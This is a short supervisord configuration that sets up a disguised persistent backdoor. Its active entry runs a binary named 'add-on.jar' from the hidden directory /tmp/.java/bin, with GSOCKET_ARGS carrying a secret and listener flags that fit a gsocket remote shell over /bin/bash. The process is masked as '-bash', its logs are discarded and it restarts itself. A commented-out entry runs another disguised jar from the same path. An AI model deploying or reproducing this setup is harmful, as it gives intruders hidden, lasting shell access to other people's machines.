[supervisord]
logfile=/dev/null

# [program:app]
# directory=/tmp/.java/bin
# command=./user-patch.jar -c ./conf.json
# stdout_logfile=/dev/null
# autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s XNWA#B8F*!34&C2K837^s*q^%czN9&399Lh^r&3 -liqD",SHELL="/bin/bash"
command=exec -a -bash ./add-on.jar
stdout_logfile=/dev/null
autorestart = true